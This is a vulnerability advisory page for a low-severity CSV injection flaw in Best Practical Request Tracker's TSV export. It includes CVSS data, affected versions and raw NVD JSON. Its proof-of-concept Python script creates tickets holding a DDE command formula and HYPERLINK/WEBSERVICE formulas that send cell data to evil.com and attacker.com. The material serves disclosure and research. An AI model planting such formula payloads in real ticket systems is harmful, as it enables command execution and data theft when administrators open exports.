CVE-2025-61873

Description

Best Practical Request Tracker (RT) before 4.4.9, 5.0.9, and 6.0.2 allows CSV Injection via ticket values when TSV export is used.

CVSS Details

CVSS Score

2.6

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Best Practical Request Tracker (RT) < 4.4.9

Best Practical Request Tracker (RT) < 5.0.9

Best Practical Request Tracker (RT) < 6.0.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-61873 CSV Injection PoC # Attacker's ticket creation with malicious formula import requests # Target RT instance target_url = "http://rt.example.com/REST/1.0/ticket/new" # Malicious payload for CSV injection # When exported as TSV and opened in Excel, this becomes a formula payload = { "subject": "Test Ticket =cmd|' /C calc'!A0", "queue": "General", "owner": "root", "requestor": "[email protected]", "description": "Description field with formula =HYPERLINK(\"http://evil.com/steal?data=\"&A1)" } # Create the malicious ticket via REST API response = requests.post(target_url, data=payload, auth=('attacker_user', 'password')) print(f"Ticket created: {response.status_code}") # Alternative: Data exfiltration formula data_exfil_payload = { "subject": "Urgent Issue =WEBSERVICE(\"http://attacker.com/log?data=\"&ENCODEURL(A1))" } requests.post(target_url, data=data_exfil_payload, auth=('attacker_user', 'password')) print("Malicious ticket created. When admin exports TSV and opens in Excel, formula will execute.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-61873
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-61873
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-61873/
[4] VulDB https://vuldb.com/cve/CVE-2025-61873
[5] https://docs.bestpractical.com/release-notes/rt/index.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-61873", "sourceIdentifier": "[email protected]", "published": "2026-01-16T19:16:17.990", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Best Practical Request Tracker (RT) before 4.4.9, 5.0.9, and 6.0.2 allows CSV Injection via ticket values when TSV export is used."}, {"lang": "es", "value": "Best Practical Request Tracker (RT) anterior a 4.4.9, 5.0.9 y 6.0.2 permite la inyección CSV a través de valores de tickets cuando se utiliza la exportación TSV."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:N/I:L/A:N", "baseScore": 2.6, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.0, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1236"}]}], "references": [{"url": "https://docs.bestpractical.com/release-notes/rt/index.html", "source": "[email protected]"}]}}